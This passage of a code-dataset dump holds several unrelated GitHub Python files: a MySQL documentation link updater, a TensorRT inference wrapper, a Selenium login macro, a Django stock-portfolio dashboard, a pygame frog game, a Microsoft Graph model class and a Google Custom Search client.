out.replace('\\n','')\n\n\n","repo_name":"npmcdn-to-unpkg-bot/stat-track","sub_path":"rethink-prototype/jq/subp.py","file_name":"subp.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34035898597","text":"#!/bin/python3\n# https://github.com/pingcap/docs/pull/13016\nimport re\nimport sys\nimport logging\nfrom pathlib import Path\nfrom glob import iglob\n\nimport requests\n\nlogging.basicConfig(level=logging.INFO)\nurls: dict[str, bool] = {}\n\n\ndef validate_url(url: str) -> bool:\n url = re.sub(\n \"https://dev.mysql.com/doc/refman/5\\.[67]/\",\n \"https://dev.mysql.com/doc/refman/8.0/\",\n url,\n )\n\n if url in urls:\n return urls[url]\n\n r = requests.get(url)\n if r.status_code == 200:\n urls[url] = True\n else:\n logging.warning(\"Got HTTP status code %s for %s\", r.status_code, url)\n urls[url] = False\n return urls[url]\n\n\ndef update_file(filename: str) -> None:\n with open(filename, \"r+\") as fh:\n content = fh.read()\n # Look for reference manual urls and stop at:\n # - the end of the url target `)`\n # - the end of the url text `]`\n # - at an anchor `#`\n for m in re.findall(\n \"https://dev.mysql.com/doc/refman/5\\.[67]/[^#\\])]*\", content\n ):\n validate_url(m)\n newcontent = re.sub(\n \"https://dev.mysql.com/doc/refman/5\\.[67]/\",\n \"https://dev.mysql.com/doc/refman/8.0/\",\n content,\n )\n newcontent = re.sub(\n \"(https://dev.mysql.com/doc/refman)/8\\.0/(.*available in MySQL 5.7)\",\n r\"\\1/5.7/\\2\",\n newcontent,\n )\n for m in re.findall(\n \"https://dev.mysql.com/doc/refman/8\\.0/[^#\\])]*\", content\n ):\n validate_url(m)\n fh.seek(0)\n fh.truncate()\n fh.write(newcontent)\n\n\nif Path().cwd().name != \"docs\":\n print(\"Please run this from the root of the docs repo.\")\n sys.exit(1)\n\nfor f in iglob(\"**/*.md\", recursive=True):\n # Skip updating release notes\n if f.startswith(\"releases/\"):\n continue\n update_file(f)\n","repo_name":"pingcap/docs","sub_path":"scripts/update_mysql_ref.py","file_name":"update_mysql_ref.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":529,"dataset":"github-code","pt":"48"} +{"seq_id":"24076639116","text":"#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\nclass 
Script:\r\n\r\n @staticmethod\r\n def get_attr(script_name):\r\n splitStr = script_name.split(\".\", -2)\r\n length = len(splitStr)\r\n for index in range(len(splitStr)):\r\n if index == length - 1:\r\n method_name = splitStr[index]\r\n elif index == length - 2:\r\n class_name = splitStr[index]\r\n elif index == 0:\r\n module_name = splitStr[index]\r\n else:\r\n module_name = module_name + '.' + splitStr[index]\r\n\r\n module = __import__(module_name,{},{},[class_name]) # import module\r\n clz = getattr(module, class_name)\r\n obj = clz() # new class\r\n mtd = getattr(obj, method_name)\r\n return mtd\r\n\r\n","repo_name":"ericcoderr/TestAutomation","sub_path":"app/WMAT/src/helper/script_helper.py","file_name":"script_helper.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18794942392","text":"import uff\nimport os\nimport tensorflow as tf\nimport pycuda.driver as cuda\nimport keras.backend as K\nfrom keras.preprocessing import image\nfrom keras.applications.resnet50 import preprocess_input\nfrom keras.applications import resnet50\nimport numpy as np\nimport tensorrt as trt\nfrom tensorrt.parsers import uffparser\n\n\n# your model should already have been trained, and you'd be using it for inference only\n# set learning phase to Testing (0) so that all untrainable nodes are excluded from the UFF model\nK.set_learning_phase(0)\n\n# very important -- gotta set the right CUDA architecture otherwise you can't build the engine\n# V100 -> 70, don't bother using this in K80s or 1080\nos.environ[\"CUDA_ARCH\"] = \"70\"\n# how much memory to allocate for the engine -- 1GB -- can go a bit higher on V100\nMAX_WORKSPACE_SIZE = 1 << 30\n# maximum batch size allowed -- 128 was the best\nMAX_BATCH_SIZE = 128\n# what datatype to represent the matrices on the GPU\nTRT_DATATYPE = trt.infer.DataType.FLOAT\ntrt_logger = trt.infer.ConsoleLogger(trt.infer.LogSeverity.INFO)\n\n\nclass TensorrtWrapper:\n\n def __init__(self, uff_path, model_input_name, model_output_name, batch_size=MAX_BATCH_SIZE):\n self.batch_size = batch_size\n self.stream = cuda.Stream()\n self.model_input_name = model_input_name\n self.model_output_name = model_output_name\n\n print(\"Creating tensorrt context....\")\n self.context = self.parse_uff_model(uff_path=uff_path)\n self.output = self.d_input = self.d_output = self.bindings = None\n print(\"Allocating memory arrays....\")\n self.allocate_memory_arrays()\n\n def parse_uff_model(self, uff_model=None, uff_path=None):\n assert uff_model or uff_path, \"Must pass in either a UFF model or the path to an UFF model in disk\"\n if uff_path:\n with open(uff_path, 'rb') as uff_file:\n uff_model = uff_file.read()\n parser = uffparser.create_uff_parser()\n # input_1\n parser.register_input(self.model_input_name, (3, 224, 224), 0)\n # dense_2/Sigmoid\n parser.register_output(self.model_output_name)\n engine = trt.utils.uff_to_trt_engine(logger=trt_logger,\n stream=uff_model,\n parser=parser,\n max_batch_size=MAX_BATCH_SIZE,\n max_workspace_size=MAX_WORKSPACE_SIZE,\n datatype=TRT_DATATYPE)\n context = engine.create_execution_context()\n return context\n\n def allocate_memory_arrays(self):\n # load engine\n engine = self.context.get_engine()\n assert (engine.get_nb_bindings() == 2), \"Wrong engine configuration for our task, please check tensorrt\" \\\n \" documentation before using this\"\n # create output array to receive data\n dims = engine.get_binding_dimensions(1).to_DimsCHW()\n elt_count = 
dims.C() * dims.H() * dims.W() * self.batch_size\n        # create a sample batch image to define how much memory we need to allocate\n        input_img = np.random.rand(self.batch_size, 224, 224, 3).astype(np.float32)\n        # Allocate pagelocked memory\n        self.output = cuda.pagelocked_empty(elt_count, dtype=np.float32)\n        print(\"Image size: {}\".format(input_img.size))\n        # allocate device memory\n        self.d_input = cuda.mem_alloc(self.batch_size * input_img.size * input_img.dtype.itemsize)\n        self.d_output = cuda.mem_alloc(self.batch_size * self.output.size * self.output.dtype.itemsize)\n        self.bindings = [int(self.d_input), int(self.d_output)]\n\n    def run_prediction(self, input_img):\n        \"\"\"\n        Use this to run the actual inference on the device\n        :return:\n        \"\"\"\n        # transfer input data to device\n        cuda.memcpy_htod_async(self.d_input, input_img, self.stream)\n        # execute model\n        self.context.enqueue(self.batch_size, self.bindings, self.stream.handle, None)\n        # transfer predictions back\n        cuda.memcpy_dtoh_async(self.output, self.d_output, self.stream)\n\n\n###################################\n### UTILS #########################\n###################################\n\n\ndef convert_keras_to_uff_model(model, uff_model_path):\n    # have to make BatchNorm layers untrainable since they're not yet supported by tensorrt\n    for entry in model.layers:\n        if 'bn' in entry.name:\n            entry.trainable = False\n\n    model_input_name = model.input.name.split(':')[0]\n    model_output_name = model.output.name.split(':')[0]\n    input_size = model.input.shape\n    print(input_size)\n    graph = tf.get_default_graph().as_graph_def()\n    init = tf.global_variables_initializer()\n    sess = K.get_session()\n    sess.run(init)\n\n    frozen_graph = tf.graph_util.convert_variables_to_constants(sess, graph, [model_output_name])\n    frozen_graph = tf.graph_util.remove_training_nodes(frozen_graph)\n    uff_model = uff.from_tensorflow(frozen_graph, [model_output_name])\n    with open(uff_model_path, 'wb') as dump:\n        dump.write(uff_model)\n\n    return model_input_name, model_output_name\n\n\ndef process_img_example():\n    test_image = image.load_img('example_image.jpg', target_size=(224, 224, 3))\n    test_image = image.img_to_array(test_image)\n    processed_im = preprocess_input(np.expand_dims(test_image, 0))[0, :, :, :]\n    processed_im = np.transpose(processed_im, axes=(2, 0, 1))\n    # gotta make the image matrix contiguous\n    processed_im = processed_im.copy(order='C')\n    return processed_im\n\n\nif __name__ == '__main__':\n    # small example\n\n    # load in the original Keras model from disk -- example with imagenet weights\n    model = resnet50.ResNet50(include_top=True, weights='imagenet')\n    model.load_weights('resnet50_example.h5')\n    model.compile(optimizer='rmsprop', loss='categorical_crossentropy')\n\n    # convert it to an UFF model\n    model_input_name, model_output_name = convert_keras_to_uff_model(model, 'uff_resnet_50.uff')\n\n    # now use the UFF model with Nvidia's Tensorrt library to speed up predictions\n    tw = TensorrtWrapper('uff_resnet_50.uff',\n                         model_input_name=model_input_name,\n                         model_output_name=model_output_name)\n\n    # generate fake images\n    images = []\n    for _ in range(128):\n        test_image = np.random.rand(224, 224, 3)\n        images.append(test_image)\n    images = np.array(images)\n    images = np.transpose(images, axes=(0, 3, 1, 2)).astype(np.float32)\n    images = images.copy(order='C')\n    tw.run_prediction(images)\n    
print(tw.output)\n","repo_name":"guilherme-pombo/Resnet_Tensorrt","sub_path":"tensorrt_wrapper.py","file_name":"tensorrt_wrapper.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"19663374006","text":"from selenium import webdriver\nimport time\nchrome_path = 'C:\\오유라\\chromedriver.exe'\nurl = 'http://www.naver.com'\n\nbrowser = webdriver.Chrome(chrome_path)\nbrowser.get(url)\ntime.sleep(3)\nbrowser.find_element_by_xpath('//*[@id=\"u_skip\"]/a[5]').click()\n\n#In the developer tools tab, copy the XPath from the element's tag to run this code\ntime.sleep(2)\nbrowser.find_element_by_css_selector('#id').send_keys(id)\ntime.sleep(2)\nbrowser.find_element_by_xpath('//*[@id=\"log-in-button\"]').click()\n\n#Keys.ENTER = Enter\n#Keys.RETURN = Enter\n#Keys.SPACE = Space\n#Keys.ARROW_UP = Up arrow key\n#Keys.ARROW_DOWN = Down arrow key\n#Keys.ARROW_LEFT = Left arrow key\n#Keys.ARROW_RIGHT = Right arrow key \n#Keys.BACK_SPACE = Backspace\n#Keys.DELETE = Delete\n#Keys.CONTROL = Ctrl\n#Keys.ALT = ALT\n#Keys.SHIFT = SHIFT\n#Keys.TAB = TAB\n#Keys.PAGE_UP = Scroll up\n#Keys.PAGE_DOWN = Scroll down \n#Keys.F1~9 = F1 through F9 \n\n#find_element_by_id = 'access using the id attribute'\n#find_element_by_name = 'access using the name attribute'\n#find_element_by_xpath = 'access using an xpath'\n#find_element_by_link_text ='access using the text of an anchor (a) tag'\n#find_element_by_partial_link_text = 'access using partial anchor-tag text'\n#find_element_by_tag_name = 'access using the tag name'\n#find_element_by_class_name = 'access using the class name'\n#find_element_by_css_selector = 'access using a CSS selector'\n","repo_name":"yuraoh123/2022python","sub_path":"매크로.py","file_name":"매크로.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74660542544","text":"import csv\nimport json\nimport random\nimport requests\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\nfrom .models import Portfolio, StockHolding\nfrom riskprofile.models import RiskProfile\nfrom riskprofile.views import risk_profile\n\n# AlphaVantage API\nfrom alpha_vantage.timeseries import TimeSeries\nfrom alpha_vantage.fundamentaldata import FundamentalData\nimport subprocess as sp\n\ndef get_alphavantage_key():\n  alphavantage_keys = [\n    settings.ALPHAVANTAGE_KEY1,\n    settings.ALPHAVANTAGE_KEY2,\n    settings.ALPHAVANTAGE_KEY3,\n    settings.ALPHAVANTAGE_KEY4,\n    settings.ALPHAVANTAGE_KEY5,\n    settings.ALPHAVANTAGE_KEY6,\n    settings.ALPHAVANTAGE_KEY7,\n  ]\n  return random.choice(alphavantage_keys)\n\n@login_required\ndef dashboard(request):\n  if RiskProfile.objects.filter(user=request.user).exists():\n    try:\n      portfolio = Portfolio.objects.get(user=request.user)\n    except:\n      portfolio = Portfolio.objects.create(user=request.user)\n    portfolio.update_investment()\n    holding_companies = StockHolding.objects.filter(portfolio=portfolio)\n    holdings = []\n    sectors = [[], []]\n    sector_wise_investment = {}\n    stocks = [[], []]\n    for c in holding_companies:\n      company_symbol = c.company_symbol\n      company_name = c.company_name\n      number_shares = c.number_of_shares\n      investment_amount = c.investment_amount\n      average_cost = investment_amount / number_shares\n      holdings.append({\n        'CompanySymbol': company_symbol,\n        'CompanyName': company_name,\n        'NumberShares': number_shares,\n        'InvestmentAmount': investment_amount,\n        'AverageCost': average_cost,\n      })\n      stocks[0].append(round((investment_amount / portfolio.total_investment) * 100, 2))\n      
stocks[1].append(company_symbol)\n if c.sector in sector_wise_investment:\n sector_wise_investment[c.sector] += investment_amount\n else:\n sector_wise_investment[c.sector] = investment_amount\n for sec in sector_wise_investment.keys():\n sectors[0].append(round((sector_wise_investment[sec] / portfolio.total_investment) * 100, 2))\n sectors[1].append(sec)\n\n # Adding\n news = fetch_news()\n ###\n\n context = {\n 'holdings': holdings,\n 'totalInvestment': portfolio.total_investment,\n 'stocks': stocks,\n 'sectors': sectors,\n 'news': news\n }\n\n return render(request, 'dashboard/dashboard.html', context)\n else:\n return redirect(risk_profile)\n\n\ndef get_portfolio_insights(request):\n try:\n portfolio = Portfolio.objects.get(user=request.user)\n holding_companies = StockHolding.objects.filter(portfolio=portfolio)\n fd = FundamentalData(key=get_alphavantage_key(), output_format='json')\n portfolio_beta = 0\n portfolio_pe = 0\n for c in holding_companies:\n data, meta_data = fd.get_company_overview(symbol=c.company_symbol)\n portfolio_beta += float(data['Beta']) * (c.investment_amount / portfolio.total_investment)\n portfolio_pe += float(data['PERatio']) * (c.investment_amount / portfolio.total_investment)\n return JsonResponse({\"PortfolioBeta\": portfolio_beta, \"PortfolioPE\": portfolio_pe})\n except Exception as e:\n return JsonResponse({\"Error\": str(e)})\n\n\ndef update_values(request):\n try:\n portfolio = Portfolio.objects.get(user=request.user)\n current_value = 0\n unrealized_pnl = 0\n growth = 0\n holding_companies = StockHolding.objects.filter(portfolio=portfolio)\n stockdata = {}\n for c in holding_companies:\n ts = TimeSeries(key=get_alphavantage_key(), output_format='json')\n data, meta_data = ts.get_quote_endpoint(symbol=c.company_symbol)\n last_trading_price = float(data['05. 
price'])\n pnl = (last_trading_price * c.number_of_shares) - c.investment_amount\n net_change = pnl / c.investment_amount\n stockdata[c.company_symbol] = {\n 'LastTradingPrice': last_trading_price,\n 'PNL': pnl,\n 'NetChange': net_change * 100\n }\n current_value += (last_trading_price * c.number_of_shares)\n unrealized_pnl += pnl\n growth = unrealized_pnl / portfolio.total_investment\n return JsonResponse({\n \"StockData\": stockdata, \n \"CurrentValue\": current_value,\n \"UnrealizedPNL\": unrealized_pnl,\n \"Growth\": growth * 100\n })\n except Exception as e:\n return JsonResponse({\"Error\": str(e)})\n\n\ndef get_financials(request):\n try:\n fd = FundamentalData(key=get_alphavantage_key(), output_format='json')\n data, meta_data = fd.get_company_overview(symbol=request.GET.get('symbol'))\n financials = {\n \"52WeekHigh\": data['52WeekHigh'],\n \"52WeekLow\": data['52WeekLow'],\n \"Beta\": data['Beta'],\n \"BookValue\": data['BookValue'],\n \"EBITDA\": data['EBITDA'],\n \"EVToEBITDA\": data['EVToEBITDA'],\n \"OperatingMarginTTM\": data['OperatingMarginTTM'],\n \"PERatio\": data['PERatio'],\n \"PriceToBookRatio\": data['PriceToBookRatio'],\n \"ProfitMargin\": data['ProfitMargin'],\n \"ReturnOnAssetsTTM\": data['ReturnOnAssetsTTM'],\n \"ReturnOnEquityTTM\": data['ReturnOnEquityTTM'],\n \"Sector\": data['Sector'],\n }\n return JsonResponse({ \"financials\": financials })\n except Exception as e:\n return JsonResponse({\"Error\": str(e)})\n\n\ndef add_holding(request):\n if request.method == \"POST\":\n try:\n portfolio = Portfolio.objects.get(user=request.user)\n holding_companies = StockHolding.objects.filter(portfolio=portfolio)\n company_symbol = request.POST['company'].split('(')[1].split(')')[0]\n company_name = request.POST['company'].split('(')[0].strip()\n number_stocks = int(request.POST['number-stocks'])\n ts = TimeSeries(key=get_alphavantage_key(), output_format='json')\n data, meta_data = ts.get_daily(symbol=company_symbol, outputsize='full')\n buy_price = float(data[request.POST['date']]['4. 
close'])\n      fd = FundamentalData(key=get_alphavantage_key(), output_format='json')\n      data, meta_data = fd.get_company_overview(symbol=company_symbol)\n      sector = data['Sector']\n\n      found = False\n      for c in holding_companies:\n        if c.company_symbol == company_symbol:\n          c.buying_value.append([buy_price, number_stocks])\n          c.save()\n          found = True\n\n      if not found:\n        c = StockHolding.objects.create(\n          portfolio=portfolio, \n          company_name=company_name, \n          company_symbol=company_symbol,\n          number_of_shares=number_stocks,\n          sector=sector\n        )\n        c.buying_value.append([buy_price, number_stocks])\n        c.save()\n\n      return HttpResponse(\"Success\")\n    except Exception as e:\n      print(e)\n      return HttpResponse(e)\n\ndef send_company_list(request):\n  with open('nasdaq-listed.csv') as csv_file:\n    csv_reader = csv.reader(csv_file, delimiter=',')\n    line_count = 0\n    rows = []\n    for row in csv_reader:\n      if line_count == 0:\n        line_count += 1\n      else:\n        rows.append([row[0], row[1]])\n        line_count += 1\n  return JsonResponse({\"data\": rows})\n\n\ndef fetch_news():\n  query_params = {\n    \"country\": \"us\",\n    \"category\": \"business\",\n    \"sortBy\": \"top\",\n    \"apiKey\": settings.NEWSAPI_KEY\n  }\n  main_url = \"https://newsapi.org/v2/top-headlines\"\n  # fetching data in json format\n  res = requests.get(main_url, params=query_params)\n  open_bbc_page = res.json()\n  # getting all articles in a string article\n  article = open_bbc_page[\"articles\"]\n  results = []\n  for ar in article:\n    results.append([ar[\"title\"], ar[\"description\"], ar[\"url\"]])\n  # Make news as 2 at a time to show on dashboard (a list, so the odd item can be appended)\n  news = list(zip(results[::2], results[1::2]))\n  if len(results) % 2:\n    news.append((results[-1], None))\n  return news\n\n\ndef backtesting(request):\n  print('Function Called')\n  try:\n    output = sp.check_output(\"quantdom\", shell=True)\n  except sp.CalledProcessError:\n    output = 'No such command'\n  return HttpResponse(\"Success\")","repo_name":"bpagare6/Portfolio-Management-System","sub_path":"portfolio_management_system/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"48"} +{"seq_id":"73883014224","text":"import random\nimport pygame\n\n\nfrom pygame.locals import K_ESCAPE, KEYDOWN, QUIT, K_RIGHT, K_LEFT, MOUSEBUTTONDOWN\n\n\npygame.init()\npygame.font.init()\n\nWIDTH = 640\nHEIGHT = 480\nSIZE = (WIDTH, HEIGHT)\n\nscreen = pygame.display.set_mode(SIZE)\nclock = pygame.time.Clock()\n\n\n\n# ---------------------------\n# Initialize global variables\n\nscene_title_font = pygame.font.SysFont('Arial', 50)\nend_scene_font = pygame.font.SysFont('Arial', 20)\ncurrent_screen = 0\nroger_x = 280\nroger_y = 280\nroger_leg_1_x = 254\nroger_leg_1_y = 292\nroger_leg_2_x = 254\nroger_leg_2_y = 311\nroger_leg_3_x = 318\nroger_leg_3_y = 292\nroger_leg_4_x = 319\nroger_leg_4_y = 311\nroger_rect = pygame.Rect(280, 280, 40, 40)\nroger_leg_rect = pygame.Rect(254,292,100,100)\nfly_rect = pygame.Rect(315, 167, 20, 20)\nboarder_1_rect = pygame.Rect(0,0,670,5)\nboarder_2_rect = pygame.Rect(0,3,5,480)\nboarder_3_rect = pygame.Rect(4,477,685,5)\nboarder_4_rect = pygame.Rect(637,3,5,480)\nscore = 0\n\n\nscore_font = pygame.font.SysFont('Comic Sans MS', 50)\n\n# ---------------------------\nrunning = True\nwhile running:\n    # EVENT HANDLING\n    \n    for event in pygame.event.get():\n        if event.type == KEYDOWN:\n            if event.key == K_ESCAPE:\n                running = False\n            elif event.key == K_RIGHT:\n                current_screen += 1\n                print(current_screen)\n            elif event.key 
== K_LEFT:\n current_screen -= 1\n elif event.type == QUIT:\n running = False\n elif event.type == MOUSEBUTTONDOWN:\n print(event.pos)\n \n \n if roger_rect.colliderect(fly_rect):\n score += 1 \n fly_rect.x = random.randint(50,200)\n fly_rect.y = random.randint(50,200)\n \n \n \n \n \n elif roger_rect.colliderect(boarder_1_rect):\n score -= 0.5\n elif roger_rect.colliderect(boarder_2_rect):\n score -= 0.5 \n elif roger_rect.colliderect(boarder_3_rect):\n score -= 0.5 \n elif roger_rect.colliderect(boarder_4_rect):\n score -= 0.5 \n \n \n \n \n \n \n\n # GAME STATE UPDATES\n keys = pygame.key.get_pressed()\n if keys[119]: # w\n roger_y -= 5\n roger_rect.y -= 5\n if keys[97] == True: # a\n roger_x -= 5\n roger_rect.x -= 5\n \n if keys[115] == True: # s\n roger_y += 5\n roger_rect.y += 5\n if keys[100] == True: # d\n roger_x += 5\n roger_rect.x += 5\n \n \n \n\n if score >= 20: \n current_screen = 3 \n \n \n \n \n\n\n screen.fill((255, 255, 255)) # always the first drawing command\n \n \n \n # Scene 0 (Menu screen)\n if current_screen == 0:\n screen.fill((25, 255, 25)) # always the first drawing command\n scene_title = scene_title_font.render( 'Hungry Roger', True, (255,255,255))\n screen.blit(scene_title, (0, 0))\n\n elif current_screen == 1:\n # Scene 1 (Instructions screen)\n screen.fill((128, 0, 0)) \n scene_title = scene_title_font.render('How to Play', True, (255, 255, 255))\n screen.blit(scene_title, (0, 0))\n screen_title = scene_title_font.render('Move with W A S D', True, (255,255,255))\n screen.blit(screen_title, (0,99))\n screen_title = scene_title_font.render('Collect 20 black flies to win', True, (255,255,255))\n screen.blit(screen_title, (0,289))\n\n if current_screen == 2:\n # scene 2 (game screen)\n screen.fill((86,125,70))\n \n # RIVER\n pygame.draw.line(screen, (38,102,145), (329,6), (241, 191), 60)\n pygame.draw.line(screen, (38,102,145), (241, 181), (306,260), 60)\n pygame.draw.line(screen, (38,102,145), (303, 244), (335,480), 52)\n\n # BUSH\n \n for x_offset in range(100, 670, 345):\n for y_offset in range(100, 320, 170): \n pygame.draw.circle(screen, (11,102,35), (x_offset, y_offset), 25)\n pygame.draw.circle(screen, (11,102,35), (x_offset + 20, y_offset + 20), 25)\n pygame.draw.circle(screen, (11,102,35), (x_offset - 20, y_offset + 20), 25)\n pygame.draw.rect(screen,(0,0,0),(fly_rect),50)\n \n pygame.draw.rect(screen, (255,0,0), (0,0,670,5),600)\n pygame.draw.rect(screen, (255,0,0), (0,3,5,480),600)\n pygame.draw.rect(screen, (255,0,0), (4,477,685,5),600)\n pygame.draw.rect(screen, (255,0,0), (637,3,5,480),600)\n pygame.draw.rect(screen, (0,0,0), (fly_rect),50)\n\n # ROGER\n pygame.draw.rect(screen, (215,250,215), (roger_x, roger_y, 40,40),25)\n score_text = score_font.render(f'Score: {score}', False, (0, 0, 0))\n screen.blit(score_text,(67,340))\n \n elif current_screen == 3: \n # scene 3 (end) \n screen.fill((128,16,200))\n scene_title = scene_title_font.render('CONGRATULATIONS', True, (255, 255, 255))\n screen.blit(scene_title, (88,31))\n scene_title = end_scene_font.render('Roger The Frog is now full from flies', True, (255,255,255))\n screen.blit(scene_title, (158,212))\n \n\n pygame.display.flip()\n clock.tick(30)\n #---------------------------\n\n\npygame.quit()\n","repo_name":"Aaronnguy/ics3u-classwork-","sub_path":"hungry_roger.py","file_name":"hungry_roger.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40720258138","text":"from __future__ import 
annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import Parsable, ParseNode, SerializationWriter\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .entity import Entity\n\nfrom .entity import Entity\n\n@dataclass\nclass UserExperienceAnalyticsResourcePerformance(Entity):\n \"\"\"\n The user experience analytics resource performance entity.\n \"\"\"\n # AverageSpikeTimeScore of a device or a model type. Valid values 0 to 100\n average_spike_time_score: Optional[int] = None\n # CPU spike time in percentage. Valid values 0 to 100\n cpu_spike_time_percentage: Optional[float] = None\n # Threshold of cpuSpikeTimeScore. Valid values 0 to 100\n cpu_spike_time_percentage_threshold: Optional[float] = None\n # The user experience analytics device CPU spike time score. Valid values 0 to 100\n cpu_spike_time_score: Optional[int] = None\n # User experience analytics summarized device count.\n device_count: Optional[int] = None\n # The id of the device.\n device_id: Optional[str] = None\n # The name of the device.\n device_name: Optional[str] = None\n # Resource performance score of a specific device. Valid values 0 to 100\n device_resource_performance_score: Optional[int] = None\n # The user experience analytics device manufacturer.\n manufacturer: Optional[str] = None\n # The user experience analytics device model.\n model: Optional[str] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # RAM spike time in percentage. Valid values 0 to 100\n ram_spike_time_percentage: Optional[float] = None\n # Threshold of ramSpikeTimeScore. Valid values 0 to 100\n ram_spike_time_percentage_threshold: Optional[float] = None\n # The user experience analytics device RAM spike time score. 
Valid values 0 to 100\n ram_spike_time_score: Optional[int] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> UserExperienceAnalyticsResourcePerformance:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: UserExperienceAnalyticsResourcePerformance\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return UserExperienceAnalyticsResourcePerformance()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .entity import Entity\n\n from .entity import Entity\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"averageSpikeTimeScore\": lambda n : setattr(self, 'average_spike_time_score', n.get_int_value()),\n \"cpuSpikeTimePercentage\": lambda n : setattr(self, 'cpu_spike_time_percentage', n.get_float_value()),\n \"cpuSpikeTimePercentageThreshold\": lambda n : setattr(self, 'cpu_spike_time_percentage_threshold', n.get_float_value()),\n \"cpuSpikeTimeScore\": lambda n : setattr(self, 'cpu_spike_time_score', n.get_int_value()),\n \"deviceCount\": lambda n : setattr(self, 'device_count', n.get_int_value()),\n \"deviceId\": lambda n : setattr(self, 'device_id', n.get_str_value()),\n \"deviceName\": lambda n : setattr(self, 'device_name', n.get_str_value()),\n \"deviceResourcePerformanceScore\": lambda n : setattr(self, 'device_resource_performance_score', n.get_int_value()),\n \"manufacturer\": lambda n : setattr(self, 'manufacturer', n.get_str_value()),\n \"model\": lambda n : setattr(self, 'model', n.get_str_value()),\n \"ramSpikeTimePercentage\": lambda n : setattr(self, 'ram_spike_time_percentage', n.get_float_value()),\n \"ramSpikeTimePercentageThreshold\": lambda n : setattr(self, 'ram_spike_time_percentage_threshold', n.get_float_value()),\n \"ramSpikeTimeScore\": lambda n : setattr(self, 'ram_spike_time_score', n.get_int_value()),\n }\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n super().serialize(writer)\n writer.write_int_value(\"averageSpikeTimeScore\", self.average_spike_time_score)\n writer.write_float_value(\"cpuSpikeTimePercentage\", self.cpu_spike_time_percentage)\n writer.write_float_value(\"cpuSpikeTimePercentageThreshold\", self.cpu_spike_time_percentage_threshold)\n writer.write_int_value(\"cpuSpikeTimeScore\", self.cpu_spike_time_score)\n writer.write_int_value(\"deviceCount\", self.device_count)\n writer.write_str_value(\"deviceId\", self.device_id)\n writer.write_str_value(\"deviceName\", self.device_name)\n writer.write_int_value(\"deviceResourcePerformanceScore\", self.device_resource_performance_score)\n writer.write_str_value(\"manufacturer\", self.manufacturer)\n writer.write_str_value(\"model\", self.model)\n writer.write_float_value(\"ramSpikeTimePercentage\", self.ram_spike_time_percentage)\n writer.write_float_value(\"ramSpikeTimePercentageThreshold\", self.ram_spike_time_percentage_threshold)\n writer.write_int_value(\"ramSpikeTimeScore\", 
self.ram_spike_time_score)\n    \n\n","repo_name":"microsoftgraph/msgraph-beta-sdk-python","sub_path":"msgraph_beta/generated/models/user_experience_analytics_resource_performance.py","file_name":"user_experience_analytics_resource_performance.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"34519985613","text":"'''\n# https://en.wikipedia.org\n\n<script>\n  (function() {\n    var cx = '012954687605534514302:-ua4o780cuo';\n    var gcse = document.createElement('script');\n    gcse.type = 'text/javascript';\n    gcse.async = true;\n    gcse.src = 'https://cse.google.com/cse.js?cx=' + cx;\n    var s = document.getElementsByTagName('script')[0];\n    s.parentNode.insertBefore(gcse, s);\n  })();\n</script>\n<gcse:search></gcse:search>\n\nhttps://cse.google.com:443/cse/publicurl?cx=012954687605534514302:-ua4o780cuo\n'''\n\n#!/usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import unicode_literals\n\nimport logging\nimport urllib\nimport urllib.parse\n\nimport sys\nimport json\nfrom collections import OrderedDict\n\nimport requests\n\nLOG = logging.getLogger('sw.google_search')\n\n\ndef _decode_response(json_string):\n    response = json.loads(json_string)\n\n    meta = {key: value for key, value in response.items() if key != 'items'}\n    num_results = int(meta['searchInformation']['totalResults'])\n    if num_results == 0:\n        LOG.info(\"No search results.\")\n        LOG.info(json.dumps(response, indent=4))\n        return []\n    else:\n        LOG.info(\"{} results.\".format(num_results))\n\n    for item in response['items']:\n        item['meta'] = meta\n\n    return response['items']\n\n\ndef _strip_protocol(url):\n    \"\"\"\n    >>> _strip_protocol('http://foo.bar/blah.x?baz=10&bob=15;x')\n    'foo.bar/blah.x?baz=10&bob=15;x'\n    \"\"\"\n    p = urllib.parse.urlparse(url)\n    new_url = urllib.parse.urlunparse(\n        ('', p.netloc, p.path, p.params, p.query, p.fragment))\n    return new_url.lstrip('/')\n\n\nclass GoogleCustomSearch(object):\n    def __init__(self, search_engine_id, api_key):\n        self.search_engine_id = 